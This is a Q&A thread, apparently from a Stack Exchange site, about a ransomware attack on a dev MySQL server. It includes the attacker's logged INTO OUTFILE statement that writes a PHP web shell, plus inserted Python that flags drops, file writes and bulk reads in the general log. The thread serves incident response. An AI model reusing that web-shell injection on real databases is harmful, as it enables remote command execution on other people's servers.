Ubuntu – local MySQL was hacked with ransomware. How to check if database data was downloaded

Tags: database, hacking, MySQL, Security, Ubuntu

I had a test mysql database running on Vagrant dev box. Turns out the network wasn't that secure.

All of the databases were deleted (and replaced with a DB ransomware note) and in the logs I can see all of the DROP DATABASE commands. However, I don't see any sign of dump or mysqldump commands anywhere.

There are some commands like below in the logs.

Query   SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
Query   SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
Query   SELECT "CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>" INTO OUTFILE '/home/http/817BCD5B9C3A4B79D312345AB.php'

However, none of the outfiles existed anywhere. Could data have been downloaded via the outfiles, or was that a means to run external commands?

I don't care that the data was deleted as this was just dev and there are many backups. The question is, could data have been downloaded if there were no dump commands? If so, what do I need to look for? I just need to try and confirm if hackers took some data, which could be leaked etc.
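One way to triage a MySQL general query log for the kinds of statements this question is about: destructive drops, INTO OUTFILE writes, and the read patterns that would indicate data leaving without any mysqldump being run. This is an added example, not code from the question or the answer; the log lines are constructed in the general-log style, the category names are my own, and the SQL_NO_CACHE / SHOW CREATE TABLE / LOCK TABLES signatures are the statements mysqldump typically issues.

```python
import re
from collections import Counter

# Constructed sample in MySQL general-log layout (timestamp, connection id,
# command, argument). Not the poster's real log; the paths are placeholders.
SAMPLE_LOG = """\
2018-03-01T10:00:01.000Z   12 Connect   root@10.0.2.2 on  using TCP/IP
2018-03-01T10:00:01.100Z   12 Query     SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
2018-03-01T10:00:01.200Z   12 Query     SHOW DATABASES
2018-03-01T10:00:02.000Z   12 Query     SELECT /*!40001 SQL_NO_CACHE */ * FROM `users`
2018-03-01T10:00:03.000Z   12 Query     SELECT 'marker' INTO OUTFILE '/var/www/html/dropped.php'
2018-03-01T10:00:04.000Z   12 Query     DROP DATABASE appdb
2018-03-01T10:00:05.000Z   12 Query     INSERT INTO WARNING.PLEASE_READ_ME VALUES ('...')
2018-03-01T10:00:06.000Z   12 Quit
"""

# Category rules (my own naming). A statement may match several categories.
RULES = [
    ("destructive", re.compile(r"^\s*DROP\s+(DATABASE|SCHEMA|TABLE)\b", re.I)),
    ("file_write",  re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\b", re.I)),
    ("file_read",   re.compile(r"\bLOAD_FILE\s*\(|\bLOAD\s+DATA\b", re.I)),
    # Statements mysqldump typically emits; their absence says nothing about plain SELECTs.
    ("dump_like",   re.compile(r"SQL_NO_CACHE\s*\*/\s*\*\s+FROM|^\s*SHOW\s+CREATE\s+TABLE|^\s*LOCK\s+TABLES\b", re.I)),
    # Whole-table reads with no WHERE clause: the quiet way to copy data out over the wire.
    ("bulk_read",   re.compile(r"^\s*SELECT\s+\*\s+FROM\b(?!.*\bWHERE\b)", re.I)),
    ("recon",       re.compile(r"^\s*SHOW\s+(DATABASES|TABLES)\b|information_schema", re.I)),
]
QUERY_RE = re.compile(r"\bQuery\s+(.*)$")
OUTFILE_RE = re.compile(r"INTO\s+(?:OUTFILE|DUMPFILE)\s+'([^']+)'", re.I)

def classify(statement):
    """Return every category whose rule matches the SQL statement."""
    return [name for name, rx in RULES if rx.search(statement)]

def scan_general_log(text):
    """Return (findings, counts); findings are (line_no, categories, statement)."""
    findings, counts = [], Counter()
    for n, line in enumerate(text.splitlines(), 1):
        m = QUERY_RE.search(line)
        if not m:
            continue                      # Connect/Quit/Init DB rows carry no SQL
        cats = classify(m.group(1))
        if cats:
            findings.append((n, cats, m.group(1).strip()))
            counts.update(cats)
    return findings, counts

def outfile_targets(text):
    """Paths the attacker tried to write via INTO OUTFILE/DUMPFILE, to check on disk."""
    return OUTFILE_RE.findall(text)

if __name__ == "__main__":
    findings, counts = scan_general_log(SAMPLE_LOG)
    for n, cats, stmt in findings:
        print(f"line {n:3} {','.join(cats):<12} {stmt}")
    print("summary:", dict(counts))
    print("outfile targets to verify on disk:", outfile_targets(SAMPLE_LOG))
```

Run the real general log through scan_general_log and group the findings by connection id: bulk_read hits on the attacker's session are the evidence of download that a search for mysqldump alone will miss, and the outfile targets are the paths worth checking for leftover files.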

Best Answer

You do realize, for ransomware to function, they have to have a copy of your data if they deleted your local copy? Otherwise there isn't much to ransom - if they just deleted it, what would you pay for? Oftentimes they will send a segment of data to prove they have a copy.

Whatever data is in that database, consider it fully breached. Keep in mind that if you have any European citizen data, the breach needs to be publicly disclosed within 72 hours of discovery.